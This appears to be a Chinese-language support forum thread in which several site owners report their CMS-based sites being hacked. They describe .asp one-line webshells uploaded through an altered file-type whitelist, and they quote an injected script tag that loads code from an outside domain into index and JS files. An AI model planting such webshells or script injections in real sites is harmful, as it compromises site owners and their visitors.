程序安全反馈
allowuploadfile 表中的 expfilename 字段被 写入 asp , 字段id被写入 5Upfiles 目录中的 person 目录中 多了一.asp的文件,文件前缀为随机产生的值,下载后打开发现是一句话木马
内容为 execute("#")
反应症状为所有目录下有index 开头的文件通通被写入了js
inc 文件夹下大部分文件被批量挂马
后台部分文件被挂马
我又修改了数据库名和后台路径并换了空间,还会出现被黑的现像,请贵公司检查程序漏洞,谢谢 一样的情况哦,等解决方案~ 官方网站也被挂马了哦。
http://demo.finereason.com/
最底下有这段代码 <scriptsrc=http://nwrf5.cn></script>,所以JS文件、index.asp、head.asp 都挂上了这段代码 你说的就是我网站中的。一样一样的。。。我把allowuploadfile表里的一些多余类型文件全删了 我现在修改完了。把数据库里的表里.asp类型文件全干掉了,改后修改后台路径,把upload文件里的.asp文件清除,把所有木马代码干掉nwrf5.cn这个 官方对免费用户的问题不太重视啊。。。两天都没人回个信儿 我的网站也是这样的情况www.qianbo.net,不知道什么时候才能好啊```` 我是昨天处理的网站程序,今天又被挂马了。。气人。。
官方为啥不早点放出补丁呢,至少现在我都不知道这个网站是怎么被黑的,通过哪个漏洞上传的 就是没人管啊。。。官方的公司要黄了吧???
论坛上垃圾信息都没有人删了。。。。 没有解决。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。
页:
[1]
2